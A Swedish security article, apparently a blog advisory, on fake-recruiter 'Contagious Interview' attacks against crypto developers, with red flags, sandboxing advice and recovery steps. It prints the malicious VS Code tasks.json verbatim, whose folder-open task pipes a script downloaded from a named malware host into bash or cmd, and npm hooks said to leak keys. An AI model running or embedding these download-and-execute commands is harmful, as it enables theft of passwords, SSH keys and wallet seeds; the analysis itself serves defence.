Smittsam Intervju: Hur falska rekryterare hackar utvecklare

Sammanfattning: En ny våg av statssponsrade attacker slår mot de bästa utvecklarna inom krypto. Bedragare utger sig för att vara rekryterare eller CTO:er och tvingar kandidater att öppna skadlig kod. Denna artikel analyserar fallet "Martin Erazo", VS Code "tasks.json"-inbrottet och det nödvändiga "Burn Protocol" för att överleva.

Varning: Denna artikel rapporterar om cybersäkerhetsincidenter där verkliga personer imiteras. Namnen "Martin Erazo" och "Ara Vartanian" hänvisar till persona som används av angripare. Vi tror att de verkliga personerna med dessa namn är oskyldiga offer för identitetsstöld.

---

---

1. Det Perfekta Offret: "Martin Erazo"-personan

Det börjar med ett meddelande som trycker på alla rätt knappar för en Senior Dev:

• Roll: CTO / Lead Architect
• Budget: $6M finansiering säkrad
• Teknik: Web3, AI, Decentraliserad Infra

I en nyligen bekräftad attack kontaktade en rekryterare vid namn "Martin Erazo" via LinkedIn. Profilen använde namn och foto från en riktig teaterregissör, men arbetshistoriken var falsk och bytte plötsligt till "IT Project Management" 2025 - ett klassiskt tecken på ett kapat eller köpt konto.

Bedrägeriet går snabbt. De hoppar över standard HR-screening och går direkt till en "Teknisk Intervju" med en hög chef - i detta fall en imitation av den riktiga bransch-CTO:n Ara Vartanian (för närvarande på Limit Break).

Röd Flagga: Projektnamn skiftar ständigt. Rekryteraren säljer in "Betfin" (en GameFi-plattform), men den skickade presentationen är för "SpaceXView" (ett Metaverse-projekt). Denna inkonsekvens är en ledtråd om att bedragare återvinner tillgångar mellan kampanjer.

2. Fällan: "Kan du granska vår MVP-kod?"

Den falska "CTO:n" hävdar att de behöver dina expertögon för att granska deras MVP (Minimum Viable Product) kod. De skickar en GitHub Repo-länk eller en ZIP-fil och pressar dig att öppna den under intervjun eller omedelbart efter.

Det är här hackningen sker.

De utnyttjar din vilja att hjälpa till och ditt ego. Du tror att du letar efter en bugg i en React-komponent. I verkligheten är "buggen" en "funktion" utformad för att stjäla dina besparingar.

3. Teknisk Infiltration: Zero-Click Malware

Angripare använder "zero-click" eller "low-click" exploits som riktar sig mot utvecklarverktyg. De behöver inte att du kör appen; bara att du öppnar mappen.

Vapnet: .vscode/tasks.json

I detta specifika fall innehöll Repot en försåtsminerad .vscode/tasks.json. Denna fil talar om för VS Code hur projektet ska byggas.

Skadlig Kod:

{
  "tasks": [
    {
      "label": "env",
      "type": "shell",
      "osx": {
        "command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
      },
      "windows": {
        "command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
      },
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

• "runOn": "folderOpen": Detta är utlösaren. I samma ögonblick som du öppnar mappen i VS Code körs denna uppgift automatiskt.
• Payload: Den använder curl för att ladda ner ett skript från vscodesettingtask.vercel.app - en känd malware-värd förklädd till ett inställnings-API.
• Resultat: Skriptet körs i minnet och stjäl omedelbart Chrome-lösenord, sessionskakor och SSH-nycklar.

Plan B: package.json scripts

Om VS Code-hacket misslyckas har de npm-skript:

"scripts": {
    "start": "node server/server.js | react-scripts start",
    "prepare": "node server/server.js"
}

Att köra npm install eller npm start utlöser server/server.js - ett lokalt C2 (Command and Control) skript som läcker dina Miljövariabler (AWS-nycklar, Wallet seeds) till angriparen.

4. Röda Flaggor vs Gröna Flaggor

Hur upptäcker du det innan det är för sent?

Om du är en Dev, bör "Privata Repon" eller ZIP-filer utlösa larm på högsta nivå. Legitima företag använder Offentliga Repon eller standardiserade testplattformar.

Varning: Detta är inte det enda sättet att attackera Devs. Läs om Samarbetsfällan på Discord och hur Supply Chain Attacks gör beroenden osäkra.

5. Säkerhetsprotokoll: Hur man intervjuar säkert

Om du är en Senior Dev kommer du att bli jagad. Att härda din miljö är obligatoriskt.

Protokoll 1: "Burner" Miljö

Använd ALDRIG din huvudsakliga arbetsstation för kodtester.

• Virtuella Maskiner: Använd VirtualBox eller VMWare.
• Cloud Dev Miljöer: Använd GitHub Codespaces eller Gitpod. Dessa är kortlivade och isolerade från dina lokala plånboksfiler.

Protokoll 2: Forensisk Revision

Innan du öppnar okänd kod:

1. Kolla .vscode/tasks.json: Sök efter runOn: folderOpen.
2. Kolla package.json: Sök efter misstänka preinstall eller postinstall skript.
3. Sökord: grep efter curl, wget, os.homedir(), .ssh, wallet.

Protokoll 3: VS Code Härdning

Inaktivera "Workspace Trust" globalt.

• Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
• Detta tvingar VS Code att be om tillåtelse innan uppgifter på mappnivå körs.

6. Lösningen: "Burn Protocol"

Om du har öppnat ett skadligt Repo (som det som skickades av "Martin Erazo"-personan), utgå från att du är hackad. En rollback räcker inte.

1. Koppla från: Dra ur ethernetkabeln omedelbart.
2. Bränn Plånboken: Dina Privata Nycklar är läckta. Skapa nya plånböcker på en ren enhet (telefon) och flytta återstående medel. Använd aldrig den gamla seeden igen.
3. Döda Sessioner: Logga ut alla sessioner på Google, GitHub, AWS. Återkalla aktiva tokens.
4. SSH Nyckel Audit: Kontrollera GitHub/GitLab-inställningar. Angripare lägger ofta till sina SSH-nycklar för att behålla bakdörrsåtkomst. Ta bort det du inte känner igen.
5. Nuke It: Rensa disken och installera om operativsystemet. Detta är det enda sättet att vara 100% säker på att Rootkits är borta.

Slutsats

"Smittsam Intervju"-bedrägeriet använder din egen expertis mot dig. Det riktar sig mot din vilja att lösa problem. Men i Web3 är paranoia en professionell dygd. Verifiera varje identitet, sandlåda varje repo och lita aldrig på en "rekryterare" som har bråttom att få dig att köra kod.